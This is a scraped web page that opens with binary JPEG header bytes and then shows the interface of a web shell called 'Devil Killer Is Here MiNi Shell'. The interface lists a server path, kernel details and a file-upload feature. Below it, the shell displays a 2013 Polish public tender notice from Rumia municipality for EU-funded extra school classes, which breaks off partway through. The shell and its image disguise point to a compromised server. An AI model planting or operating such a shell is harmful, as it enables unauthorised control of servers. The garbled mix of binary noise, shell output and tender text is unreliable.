JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130422/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130422/61047-N-2013.html

<p class="kh_header"><b>Rumia: Organizacja i prowadzenie zajęć dodatkowych w czterech szkołach podstawowych Gminy Miejskiej Rumia w roku szkolnym 2012-2013 w ramach projektu Fundamenty przyszłości - wyrównywanie szans edukacyjno-rozwojowych uczniów klas I-III czterech szkół podstawowych w Gminie Miejskiej Rumia współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki 2007 - 2013.</b><br>
<b>Numer ogłoszenia: 61047 - 2013; data zamieszczenia: 22.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Rumia , ul. Sobieskiego 7/204, 84-230 Rumia, woj. pomorskie, tel. 058 6719410, faks 058 6796517.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.miasto.rumia.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja i prowadzenie zajęć dodatkowych w czterech szkołach podstawowych Gminy Miejskiej Rumia w roku szkolnym 2012-2013 w ramach projektu Fundamenty przyszłości - wyrównywanie szans edukacyjno-rozwojowych uczniów klas I-III czterech szkół podstawowych w Gminie Miejskiej Rumia współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki 2007 - 2013..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest organizacja i prowadzenie zajęć dodatkowych w czterech szkołach podstawowych Gminy Miejskiej Rumia w roku szkolnym 2012-2013 w ramach projektu Fundamenty przyszłości - wyrównywanie szans edukacyjno-rozwojowych uczniów klas I-III czterech szkół podstawowych w Gminie Miejskiej Rumia współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki 2007 - 2013, Priorytet IX: Rozwój wykształcenia i kompetencji w regionach, Działania: 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałania 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji  oraz zmniejszenie różnic w jakości usług edukacyjnych - projekty .
2.Przedmiot zamówienia obejmuje następujące usługi podzielone na części (zadania): Przedmiot zamówienia obejmuje następujące usługi w podziale na części (zadania): 1)  Zadanie 2 - Organizacja i prowadzenie w roku szkolnym 2012/2013 w Szkole Podstawowej Nr 1 w Rumi zajęć  dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych w łącznej liczbie godzin 30; 2)  Zadanie 3.1-   Organizacja i prowadzenie w roku szkolnym 2012/2013 w   Szkole Podstawowej nr 6 w Rumi zajęć socjoterapeutycznych -  dogoterapia w łącznej liczbie godzin 40 - psycholog. 3) Zadanie  3.2 -  Organizacja i prowadzenie w roku szkolnym 2012/2013 w Szkole Podstawowej nr 6 w Rumi zajęć socjoterapeutycznych -  dogoterapia  w łącznej liczbie godzin 120 - dogoterapeuta oraz koszty transportu psów na zajęcia.
4)  Zadanie  5 - Organizacja i prowadzenie w roku szkolnym 2012/2013 w   Szkole Podstawowej nr 6 w Rumi zajęć logopedycznych dla dzieci z zaburzeniami rozwoju mowy w łącznej liczbie godzin 60. 3.Szczegółowy opis przedmiotu zamówienia na poszczególne części (zadania) wymieniony jest w opisie poszczególnych części (zadań) zamówienia oraz na stronie internetowej zamawiającego. 4. Zamawiający żąda wskazania przez Wykonawcę w ofercie części (zadania) zamówienia, które powierzy  Podwykonawcom..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.06.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-  posiadania niezbędnej wiedzy i doświadczenia lub polegania na wiedzy i doświadczeniu innych podmiotów  poprzez wykazanie się realizacją zajęć edukacyjnych, tj.  co najmniej jedną usługą dotyczącą zajęć edukacyjnych której wartość wynosi co najmniej 2.000 zł, zgodnie  z wymaganiami zawartymi w  opisie przedmiotu zamówienia do każdej części postępowania, stanowiącym załącznik  nr 1 do niniejszej SIWZ. 
- Dysponowanie odpowiednim osobami zdolnymi do wykonania zamówienia, które mają odpowiednie przygotowanie  do realizacji przedmiotu zamówienia. Zakres wymagań, które należy spełnić podejmując się realizacji  poszczególnych części (zadań) zamówienia określony został w opisie przedmiotu zamówienia do każdej części (zadania) postępowania oraz na stronie internetowej zamawiającego.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy z zastrzeżeniem postanowień zawartych w projekcie umowy, tj.:
1) wynikających ze zmian obowiązujących przepisów prawnych,
2) wynikających ze zmiany wytycznych lub zaleceń instytucji, która przyznała środki na sfinansowanie zamówienia,
3) będących działaniem siły wyższej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.rumia.pl (zamówienia publiczne - przetargi aktualne)<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Rumi, 84-230 Rumia, ul. Sobieskiego 7, pok. 213..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.04.2013 godzina 08:30, miejsce: Urząd Miasta Rumi, 84-230 Rumia, ul. Sobieskiego 7, pok. 204..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Organizacja i prowadzenie zajęć dodatkowych w czterech szkołach podstawowych Gminy  Miejskiej Rumia w roku szkolnym 2012-2013 w ramach projektu Fundamenty przyszłości - wyrównywanie szans edukacyjno-rozwojowych uczniów klas I-III czterech szkół podstawowych w Gminie Miejskiej Rumia jest współfinansowane ze środków  Unii Europejskiej ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki 2007 - 2013, Priorytet IX: Rozwój wykształcenia i kompetencji w regionach, Działania: 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałania 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych - projekty systemowe..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadaie nr 2: Organizacja i prowadzenie w roku szkolnym 2012/2013 zajęć dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych w łącznej liczbie godzin 30..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> OPIS  PRZEDMIOTU ZAMÓWIENIA: 1.Przedmiotem zamówienia jest organizacja i prowadzenie zajęć dodatkowych w czterech szkołach podstawowych Gminy  Miejskiej Rumia w roku szkolnym 2012/2013 w ramach projektu Fundamenty przyszłości - wyrównywanie szans edukacyjno-rozwojowych uczniów klas I-III czterech szkół podstawowych w Gminie Miejskiej Rumia współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki 2007 - 2013, Priorytet IX: Rozwój wykształcenia i kompetencji w regionach, Działania: 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałania 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji  oraz zmniejszenie różnic w jakości usług edukacyjnych - projekty systemowe - postępowanie uzupełniające II.
2.Projekt ma na celu przede wszystkim wsparcie indywidualnego rozwoju uczniów i uczennic klas I-III poprzez dostosowanie wsparcia do ich indywidualnych potrzeb zdiagnozowanych w okresie realizacji projektu 2011-2013. 
3.Wybrany Wykonawca/wykonawczyni powinien/powinna zapoznać się z następującymi dokumentami:
1) wnioskiem o dofinansowanie projektu  Fundamenty przyszłości - wyrównywanie szans edukacyjno-rozwojowych uczniów klas I-III czterech szkół podstawowych w Gminie Miejskiej Rumia, 2) zasadami przygotowania, realizacji i rozliczania projektów systemowych w zakresie indywidualizacji nauczania realizowanych przez organy prowadzące szkoły w ramach Programu Operacyjnego Kapitał Ludzki: http://defs.pomorskie.eu/pl/projekty_systemowe/priorytet_ix/klasy_1_3/dokumenty,
3) dokumentacją konkursową Programu Operacyjnego Kapitał Ludzki Priorytet IX, Działanie 9.1 Poddziałanie 9.1.2: Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych - projekty systemowe: www.defs.pomorskie.eu/pl,
4) diagnozą i analizą potrzeb uczniów klas I-III szkół podstawowych biorących udział  w projekcie, przeprowadzaną przez powołany do tego celu szkolny zespół nauczycieli i dostępną w danej szkole, 4. Wykonawca/wykonawczyni zobowiązany/na będzie do prowadzenia dzienników zajęć dodatkowych zgodnie z obowiązującymi przepisami. 5. Wykonawca/wykonawczyni obowiązany/zobowiązana będzie do wspomagania promocji i ewaluacji projektu - informowanie o współfinansowaniu Projektu i niniejszej umowy ze środków Europejskiego Funduszu Społecznego oraz współpracy z Koordynatorem Projektu w mierzeniu postępów uczniów i uczennic w zakresie rezultatów Projektu. 6.Wykonawca/wykonawczyni będzie dokonywał/ła ewaluacji pracy dla zajęć pozalekcyjnych oraz dokonywał/ła ewaluacji osiągnięć rozwojowych ucznia/uczennicy (Beneficjentów Ostatecznych) pod kątem rozwoju postaw, umiejętności i poziomu wiedzy, w tym w zakresie rezultatów wskazanych  w Projekcie. 7.Wykonawca/Wykonawczyni będzie ponosił/ła odpowiedzialność materialną za powierzone mienie tj. materiały i pomoce dydaktyczne udostępnione do prowadzenia zajęć. Zajęcia prowadzone przez Wykonawcę/Wykonawczynię winny uwzględniać zastosowanie powyższych pomocy dydaktycznych w jak największym stopniu, o ile charakter danego rodzaju zajęć umożliwia i uzasadnia ich stosowanie. 8.Wykonawca/Wykonawczyni ma obowiązek prowadzenia zajęć metodami aktywizującymi z wykorzystaniem zakupionych w ramach projektu pomocy i materiałów dydaktycznych. 9.W przypadku niemożności prowadzenia usługi edukacyjnej Wykonawca/Wykonawczyni będzie miał obowiązek we własnym zakresie przedstawić zastępstwo osoby o wymaganych w postępowaniu w danej części kwalifikacjach, po wcześniejszym pisemnych poinformowaniu o zaistniałej sytuacji Koordynatora Projektu i uzyskaniu jego zgody.
10. W celach rozliczeniowych Zamawiający przyjął, że godzina zajęć edukacyjnych rozwijających uzdolnienia i dydaktyczno - wyrównawczych trwa 45 minut, a zajęć specjalistycznych  - 60 minut.  W uzasadnionych przypadkach dopuszcza się prowadzenie zajęć specjalistycznych w krótszym czasie niż 60 minut, zachowując ustalony dla ucznia łączny czas tych zajęć. 11. Zgodnie z zachowaniem zasady gender każdorazowo, gdy jest mowa o uczniach ma się  na myśli uczniów i uczennice. Natomiast, gdy mówi się o Wykonawcy  - chodzi o Wykonawcę, Wykonawczynię bądź  przedsiębiorstwo. W RAMACH PRZEDMIOTU ZAMÓWIENIA WYODRĘBNIONO NASTĘPUJĄCE ZADANIA: Zadanie Nr 2: Usługa edukacyjna dla uczniów klas I-III Szkoły Podstawowej Nr 1 w Rumi, ul. Kościelna 6; 84-230 Rumia  - organizacja i prowadzenie w roku szkolnym 2012/2013 zajęć dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych w łącznej liczbie godzin 30. Opis zajęć: - zajęcia będą prowadzone w jednej grupie, która będzie liczyła  8 uczniów - zajęcia grupy będą odbywały się co najmniej 1 razy w tygodniu, po uzgodnieniu szczegółowego harmonogramu z Koordynatorem Szkolnym.
Cele zajęć:- wyrównywanie braków w wiadomościach i umiejętnościach uczniów będących przyczyną trudności szkolnych oraz zachęcanie do zwiększenia wysiłku w uczeniu się matematyki, - zniwelowanie przykrych doświadczeń związanych z porażkami ucznia na lekcjach matematyki, - rozwijanie umiejętności matematycznych, w szczególności:a) stymulacja i wspomaganie rozwoju oraz korekta zaburzonych procesów poznawczych, b) harmonijny rozwój w sferze intelektualnej, emocjonalnej i sprawnościowej, c) rekonstrukcja wiadomości i umiejętności, d) rozbudzanie zainteresowań, wyrabianie własnej motywacji do nauki,
e) ułatwienie umiejętności liczenia poprzez ćwiczenia koncentracji uwagi, rozwijanie   spostrzegawczości, f) kształtowanie umiejętności porównywania, segregowania i samokontroli, g) pozytywne nastawienie do uczenia się matematyki w warunkach szkolnych, h) pogłębianie i utrwalanie znajomości czterech działań arytmetycznych wraz z opanowaniem podstaw techniki rachunkowej, i) kształtowanie wstępnej matematyzacji konkretnych sytuacji i umiejętność ich słownego opisu oraz przy użyciu schematów obrazowych i symboli matematycznych, j) rozwijanie umiejętności posługiwania się metodami matematycznymi przy rozwiązywaniu problemów dotyczących treści programowych oraz sytuacji życiowych,
k) rozumienie działań na liczbach w oderwaniu od konkretnej sytuacji,
l)wdrażanie do samodzielnej pracy z tekstem matematycznym,
m) rozwijanie wyobraźni, myślenia, aktywności twórczej i zainteresowań matematyką. Przewidywane efekty: - wyrównanie braków w wiadomościach i umiejętnościach uczniów, - zniwelowanie przykrych doświadczeń związanych z porażkami ucznia na lekcjach matematyki, - rozwijanie umiejętności matematycznych, w szczególności: a) korekta zaburzonych procesów poznawczych, b) rozwój w sferze intelektualnej, emocjonalnej i sprawnościowej,
c) nabycie wiadomości i umiejętności matematycznych, d) rozbudzanie zainteresowań, wyrabianie własnej motywacji do nauki, e) nabycie umiejętności liczenia poprzez ćwiczenia koncentracji uwagi, rozwijanie spostrzegawczości,
f) kształtowanie umiejętności porównywania, segregowania i samokontroli,
g) zmiana nastawienia uczenia do matematyki, h) utrwalanie znajomości czterech działań arytmetycznych wraz z opanowaniem podstaw techniki rachunkowej,
i) kształtowanie wstępnej matematyzacji konkretnych sytuacji i umiejętność ich słownego opisu oraz przy użyciu schematów obrazowych i symboli matematycznych, j) rozwój umiejętności posługiwania się metodami matematycznymi przy rozwiązywaniu problemów dotyczących treści programowych oraz sytuacji życiowych, k) nabycie umiejętności rozumienia działań na liczbach w oderwaniu od konkretnej sytuacji, l) wdrażanie do samodzielnej pracy z tekstem matematycznym, m) rozwój wyobraźni, myślenia, aktywności twórczej i zainteresowań matematyką. Minimalne warunki udziału w postępowaniu:
- ukończone studia wyższe w zakresie edukacji wczesnoszkolnej i przedszkolnej lub równoważne, - 6 miesięczne doświadczenie zawodowe  w pracy z dziećmi w szkole podstawowej, - możliwość prowadzenia zajęć w godzinach przedpołudniowych, w czasie dostosowanym do uczniów, -  możliwość codziennego kontaktu z rodzicami i wychowawcami podopiecznych, - codzienna dyspozycyjność do prowadzenia zajęć..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.06.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie 3.1: Organizacja i prowadzenie w roku szkolnym 2012/2013 w   Szkole Podstawowej nr 6 w Rumi zajęć socjoterapeutycznych -  dogoterapia w łącznej liczbie godzin 40 - psycholog.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> OPIS  PRZEDMIOTU ZAMÓWIENIA: 1.Przedmiotem zamówienia jest organizacja i prowadzenie zajęć dodatkowych w czterech szkołach podstawowych Gminy  Miejskiej Rumia w roku szkolnym 2012/2013 w ramach projektu Fundamenty przyszłości - wyrównywanie szans edukacyjno-rozwojowych uczniów klas I-III czterech szkół podstawowych w Gminie Miejskiej Rumia współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki 2007 - 2013, Priorytet IX: Rozwój wykształcenia i kompetencji w regionach, Działania: 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałania 9.1.2. Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji  oraz zmniejszenie różnic w jakości usług edukacyjnych - projekty systemowe - postępowanie uzupełniające II.

2.Projekt ma na celu przede wszystkim wsparcie indywidualnego rozwoju uczniów i uczennic klas I-III poprzez dostosowanie wsparcia do ich indywidualnych potrzeb zdiagnozowanych w okresie realizacji projektu 2011-2013. 

3.Wybrany Wykonawca/wykonawczyni powinien/powinna zapoznać się z następującymi dokumentami:

1) wnioskiem o dofinansowanie projektu  Fundamenty przyszłości - wyrównywanie szans edukacyjno-rozwojowych uczniów klas I-III czterech szkół podstawowych w Gminie Miejskiej Rumia,

2) zasadami przygotowania, realizacji i rozliczania projektów systemowych w zakresie indywidualizacji nauczania realizowanych przez organy prowadzące szkoły w ramach Programu Operacyjnego Kapitał Ludzki: http://defs.pomorskie.eu/pl/projekty_systemowe/priorytet_ix/klasy_1_3/dokumenty,

3) dokumentacją konkursową Programu Operacyjnego Kapitał Ludzki Priorytet IX, Działanie 9.1 Poddziałanie 9.1.2: Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych - projekty systemowe: www.defs.pomorskie.eu/pl,

